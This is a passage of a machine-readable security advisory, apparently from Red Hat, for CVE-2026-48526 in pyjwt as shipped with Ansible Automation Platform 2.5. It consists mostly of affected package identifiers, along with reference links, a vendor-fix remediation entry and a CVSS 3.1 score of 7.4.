"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-48526"
},
{
"category": "external",
"summary": "RHBZ#2482734",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2482734"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-48526",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-48526"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-48526",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48526"
},
{
"category": "external",
"summary": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx",
"url": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx"
}
],
"release_date": "2026-05-28T15:09:09.258000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:10:56+00:00",
"details": "For details on how to apply this update, refer to Ansible Automation Platform documentation.",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50319"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
